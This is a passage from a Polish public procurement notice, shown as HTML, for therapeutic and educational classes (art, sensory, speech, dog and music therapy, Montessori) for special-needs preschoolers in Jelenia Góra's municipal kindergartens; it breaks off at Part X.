              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>	Doświadczenie osób wyznaczonych do realizacji zamówienia </td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zakazuje się zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że zachodzi co
najmniej jedna z okoliczności wymienionych w art. 144 ust. 1 pkt 2) do 6) upzp. 
2.W przypadku zmiany powszechnie obowiązujących przepisów prawa w
zakresie mającym wpływ na realizację przedmiotu zamówienia - odpowiednie zapisy umowy zostaną dostosowane do obowiązującego stanu prawnego. 
3. Wszystkie zmiany umowy dokonywane będą w formie pisemnej i muszą być podpisane przez upoważnionych przedstawicieli obu stron. 
4. Zmiana dokonana z naruszeniem przepisu pkt.1 i pkt.3 podlega unieważnieniu.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 13/02/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              POLSKI<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                tak
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>zajęcia arteterapii<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu zajęć dydaktycznych dla wychowanków przedszkoli, którzy posiadają orzeczenia o potrzebie kształcenia specjalnego funkcjonujących w jeleniogórskich przedszkolach miejskich dla których organem prowadzącym jest Miasto Jelenia Góra.
Placówki oświatowe: Miejskie Przedszkole Nr 2, Miejskie Przedszkole Nr 19, Miejskie Przedszkole Specjalne w Specjalnym Ośrodku Szkolno - Wychowawczym.

Zajęcia będą obejmowały m.in:
- doskonalenie sprawności manualnej i koordynacji wzrokowo- ruchowej;
- ćwiczenia tempa wykonywanej pracy;
- ćwiczenie koncentracji;
- przyswajanie pojęć za pomocą obrazów;
- pracę nad orientacją przestrzenną oraz percepcją motoryczną;
- ćwiczenia orientacji w schemacie ciała.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Istotnych Warunków Zamówienia.
ŁĄCZNA ILOŚĆ GODZIN (lata 2017-2018):315 godzin;
Czas trwania zajęć w zakresie poszczególnych części zamówienia: 1 godzina zajęć  jest równa godzinie zegarowej  60 minut.
Termin realizacji zamówienia: od dnia podpisania umowy do 30.04.2018 r. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>Doświadczenie osób wyznaczonych do realizacji zamówienia </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>zajęcia arteterapii z zabawami kreatywnymi<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu zajęć dydaktycznych dla wychowanków przedszkoli, którzy posiadają orzeczenia o potrzebie kształcenia specjalnego funkcjonujących w jeleniogórskich przedszkolach miejskich dla których organem prowadzącym jest Miasto Jelenia Góra.
Placówki oświatowe: Miejskie Przedszkole Nr 4, Miejskie Przedszkole Specjalne w Specjalnym Ośrodku Szkolno - Wychowawczym.

Zajęcia będą obejmowały m.in:
- doskonalenie sprawności manualnej i koordynacji wzrokowo- ruchowej;
- ćwiczenia tempa wykonywanej pracy;
- ćwiczenie koncentracji;
- przyswajanie pojęć za pomocą obrazów;
- pracę nad orientacją przestrzenną oraz percepcją motoryczną;
- ćwiczenia orientacji w schemacie ciała.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Istotnych Warunków Zamówienia.

ŁĄCZNA ILOŚĆ GODZIN (lata 2017-2018):315 godzin;
Czas trwania zajęć w zakresie poszczególnych części zamówienia: 1 godzina zajęć  jest równa godzinie zegarowej  60 minut.
Termin realizacji zamówienia: od dnia podpisania umowy do 30.04.2018 r. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>Doświadczenie osób wyznaczonych do realizacji zamówienia </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>III
                  
                <b>Nazwa: </b>zajęcia terapii taktylnej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu zajęć dydaktycznych dla wychowanków przedszkoli, którzy posiadają orzeczenia o potrzebie kształcenia specjalnego funkcjonujących w jeleniogórskich przedszkolach miejskich dla których organem prowadzącym jest Miasto Jelenia Góra.
Placówki oświatowe: Miejskie Przedszkole Nr 2
Zajęcia będą obejmowały m.in:
- stymulację zmysłu dotykowego poprzez wykorzystanie neurologicznych zasobów aktywności ruchowej organizmu;
- praca ze zmysłem dotyku;
- stymulacja receptorów znajdujących się w skórze zgodnie z ich funkcjami m.in. ze wzrostem skóry, strukturą mięśniową i kostną ciała;
- powierzchowny dotyk (masaż) skóry w obrębie całego ciała (głaskanie, rozcieranie uciskanie, rozciąganie)
- głęboki dotyk (masaż proprioceptywny) w obrębie mięśni i stawów (ugniatanie rozcieranie, wibracja);
- stymulację punktów neuromotorycznych.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Istotnych Warunków Zamówienia.

ŁĄCZNA ILOŚĆ GODZIN (lata 2017-2018):252 godzin;
Czas trwania zajęć w zakresie poszczególnych części zamówienia: 1 godzina zajęć  jest równa godzinie zegarowej  60 minut.
Termin realizacji zamówienia: od dnia podpisania umowy do 30.04.2018 r. 
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>Doświadczenie osób wyznaczonych do realizacji zamówienia </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>IV
                  
                <b>Nazwa: </b>zajęcia integracji sensorycznej<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu zajęć dydaktycznych dla wychowanków przedszkoli, którzy posiadają orzeczenia o potrzebie kształcenia specjalnego funkcjonujących w jeleniogórskich przedszkolach miejskich dla których organem prowadzącym jest Miasto Jelenia Góra.
Placówki oświatowe: Miejskie Przedszkole Nr 2 Miejskie Przedszkole Nr 4, Miejskie Przedszkole Nr 10, Miejskie Przedszkole Nr 13, Miejskie Przedszkole Nr 19, Miejskie Przedszkole Nr 27

Zajęcia będą obejmowały m.in:
- ćwiczenia rozwijające percepcję wrażeń: dotykowych, proprioceptywnych, przedsionkowych, wzrokowych, słuchowych;
- ćwiczenia stymulujące układ przedsionkowy i proprioceptywny;
- ćwiczenia kształtujące obraz i schemat ciała;
- ćwiczenia w celu poprawienia motoryki małej i dużej;
- wzmacnianie bodźców dotykowych, wzrokowych, węchowych;
- ćwiczenia umiejętności odbierania bodźców sensorycznych.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Istotnych Warunków Zamówienia.

ŁĄCZNA ILOŚĆ GODZIN (lata 2017-2018):441 godzin;
Czas trwania zajęć w zakresie poszczególnych części zamówienia: 1 godzina zajęć  jest równa godzinie zegarowej  60 minut.
Termin realizacji zamówienia: od dnia podpisania umowy do 30.04.2018 r. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>Doświadczenie osób wyznaczonych do realizacji zamówienia </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>V
                  
                <b>Nazwa: </b>zajęcia integracji sensorycznej  z gimnastyką korekcyjną<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu zajęć dydaktycznych dla wychowanków przedszkoli, którzy posiadają orzeczenia o potrzebie kształcenia specjalnego funkcjonujących w jeleniogórskich przedszkolach miejskich dla których organem prowadzącym jest Miasto Jelenia Góra.
Placówki oświatowe: Miejskie Przedszkole Nr 4, Miejskie Przedszkole Nr 10, Miejskie Przedszkole Nr 13, Miejskie Przedszkole Nr 19

Zajęcia będą obejmowały m.in:
- ćwiczenia rozwijające percepcję wrażeń: dotykowych, proprioceptywnych, przedsionkowych, wzrokowych, słuchowych;
- ćwiczenia stymulujące układ przedsionkowy i proprioceptywny;
- ćwiczenia kształtujące obraz i schemat ciała;
- ćwiczenia w celu poprawienia motoryki małej i dużej;
- wzmacnianie bodźców dotykowych, wzrokowych, węchowych;
- ćwiczenia umiejętności odbierania bodźców sensorycznych.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Istotnych Warunków Zamówienia.

ŁĄCZNA ILOŚĆ GODZIN (lata 2017-2018):315 godzin;
Czas trwania zajęć w zakresie poszczególnych części zamówienia: 1 godzina zajęć  jest równa godzinie zegarowej  60 minut.
Termin realizacji zamówienia: od dnia podpisania umowy do 30.04.2018 r. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>Doświadczenie osób wyznaczonych do realizacji zamówienia </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>VI
                  
                <b>Nazwa: </b>zajęcia logopedyczne  z elementami Logorytmiki, zajęcia logopedyczne  z Metodą Dobrego Startu, zajęcia logopedyczne<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu zajęć dydaktycznych dla wychowanków przedszkoli, którzy posiadają orzeczenia o potrzebie kształcenia specjalnego funkcjonujących w jeleniogórskich przedszkolach miejskich dla których organem prowadzącym jest Miasto Jelenia Góra.
Placówki oświatowe: Miejskie Przedszkole Nr 2, Miejskie Przedszkole Nr 11, Miejskie Przedszkole Nr 13.

Zajęcia będą obejmowały m.in:
- korygowanie wad wymowy, słuchu;
- usprawnianie narządów mowy i całego ciała;
- usprawnianie czynności analizatorów: wzrokowego, słuchowego i kinestycznoruchowego;
- zwiększanie kompetencji językowych;
- pracę nad zasobem słów, ich rozumieniem;
- pracę z fonetyką;
- pracę nad lepszą komunikacją;
- korygowanie substytucji k/t, g/d,
- stymulację percepcji słuchowej;
- usprawnianie aparatu artykulacyjnego i oddechowego;
- pracę nad koncentracją uwagi na wypowiedziach ustnych;
- pracę nad artykulacją;
- zabawy uwrażliwiające na formy M i K nazw zawodów. Osoba prowadząca zajęcia zobowiązana będzie zwracać uwagę by unikać stereotypów płciowych, jakie przekazy wzmacniać, jakie osłabiać, na co zwrócić uwagę dzieci, jak dostosować gry, zabawy, ćwiczenia by nie utrwalać płciowych stereotypów (standard min.)
Szczegółowy opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Istotnych Warunków Zamówienia.

ŁĄCZNA ILOŚĆ GODZIN (lata 2017-2018):248 godzin;
Czas trwania zajęć w zakresie poszczególnych części zamówienia: 1 godzina zajęć  jest równa godzinie zegarowej  60 minut.
Termin realizacji zamówienia: od dnia podpisania umowy do 30.04.2018 r. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>Doświadczenie osób wyznaczonych do realizacji zamówienia </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>VII
                  
                <b>Nazwa: </b>zajęcia dogoterapii<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu zajęć dydaktycznych dla wychowanków przedszkoli, którzy posiadają orzeczenia o potrzebie kształcenia specjalnego funkcjonujących w jeleniogórskich przedszkolach miejskich dla których organem prowadzącym jest Miasto Jelenia Góra.
Placówki oświatowe: Miejskie Integracyjne Przedszkole Nr 14, Miejskie Przedszkole Specjalne w Specjalnym Ośrodku Szkolno - Wychowawczym.

Zajęcia będą obejmowały rodzaje terapii w zależności od indywidualnych potrzeb dzieci m.in.:
- AAA (Animal Assisted Activity), która dostarczy możliwości motywacyjnych, edukacyjnych, rekreacyjnych i terapeutycznych korzyści;
- AAT (Animal Assisted Therapy) powodujące poprawę w fizycznym, społecznym, emocjonalnym i poznawczym funkcjonowaniu dziecka;
- AAE (Animal Assisted Education) w celu poprawienia funkcji poznawczych uczniów.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Istotnych Warunków Zamówienia.

ŁĄCZNA ILOŚĆ GODZIN (lata 2017-2018):378 godzin;
Czas trwania zajęć w zakresie poszczególnych części zamówienia: 1 godzina zajęć  jest równa godzinie zegarowej  60 minut.
Termin realizacji zamówienia: od dnia podpisania umowy do 30.04.2018 r. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>Doświadczenie osób wyznaczonych do realizacji zamówienia </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>VIII
                  
                <b>Nazwa: </b>zajęcia Montessori<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu zajęć dydaktycznych dla wychowanków przedszkoli, którzy posiadają orzeczenia o potrzebie kształcenia specjalnego funkcjonujących w jeleniogórskich przedszkolach miejskich dla których organem prowadzącym jest Miasto Jelenia Góra.
Placówki oświatowe: Miejskie Przedszkole Specjalne w Specjalnym Ośrodku Szkolno - Wychowawczym.

Zajęcia będą obejmowały m.in:
- metody czynne: samodzielnych doświadczeń, kierowania własną działalnością dziecka;
- metody zadań stawianych dziecku;
- metody ćwiczeń utrwalających;
- metody oglądowe: obserwacja i pokaz, osobisty przykład nauczyciela;
- udostępnianie sztuki/dzieła plastyczne;
- przestawienia teatralne;
- ilustrowane artystycznie utwory literackie;
- metody słowne: rozmowy, opowiadania, zagadki, objaśnienia i instrukcje;
- sposoby społecznego porozumiewania się;
- metody żywego słowa.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Istotnych Warunków Zamówienia.

ŁĄCZNA ILOŚĆ GODZIN (lata 2017-2018):189 godzin;
Czas trwania zajęć w zakresie poszczególnych części zamówienia: 1 godzina zajęć  jest równa godzinie zegarowej  60 minut.
Termin realizacji zamówienia: od dnia podpisania umowy do 30.04.2018 r. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>Doświadczenie osób wyznaczonych do realizacji zamówienia </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>IX
                  
                <b>Nazwa: </b>zajęcia muzykoterapii<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu zajęć dydaktycznych dla wychowanków przedszkoli, którzy posiadają orzeczenia o potrzebie kształcenia specjalnego funkcjonujących w jeleniogórskich przedszkolach miejskich dla których organem prowadzącym jest Miasto Jelenia Góra.
Placówki oświatowe: Miejskie Przedszkole Specjalne w Specjalnym Ośrodku Szkolno - Wychowawczym.

Zajęcia będą obejmowały m.in:
- impresje muzyczne wyzwalające energię dzieci wg zaplanowanych sekwencji ruchowych;
- konsekwentne realizowanie przez dzieci zadań;
- słuchanie piosenek śpiewanych przez terapeutę bądź dzieci;
- słuchanie gry na instrumentach (terapeuty lub innych osób);
- słuchanie muzyki artystycznej o charakterze ilustracyjnoprogramowym dostosowanej do wieku i możliwości percepcyjnych dzieci;
- ćwiczenia muzycznoruchowe;
- zadania z udziałem instrumentów perkusyjnych;
- poddane dyscyplinie rytmicznej.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Tomie III Specyfikacji Istotnych Warunków Zamówienia.

ŁĄCZNA ILOŚĆ GODZIN (lata 2017-2018):252 godzin;
Czas trwania zajęć w zakresie poszczególnych części zamówienia: 1 godzina zajęć  jest równa godzinie zegarowej  60 minut.
Termin realizacji zamówienia: od dnia podpisania umowy do 30.04.2018 r. <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>80000000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 30/04/2018<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>CENA</td><td>60</td></tr><tr><td>Doświadczenie osób wyznaczonych do realizacji zamówienia </td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>X
                  
                <b>Nazwa: </b>zajęcia z psychologiem<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest usługa polegająca na przeprowadzeniu zajęć dydaktycznych dla wychowanków przedszkoli, którzy posiadają orzeczenia o potrzebie kształcenia specjalnego funkcjonujących w jeleniogórskich przedszkolach miejskich dla których organem prowadzącym jest Miasto Jelenia Góra.
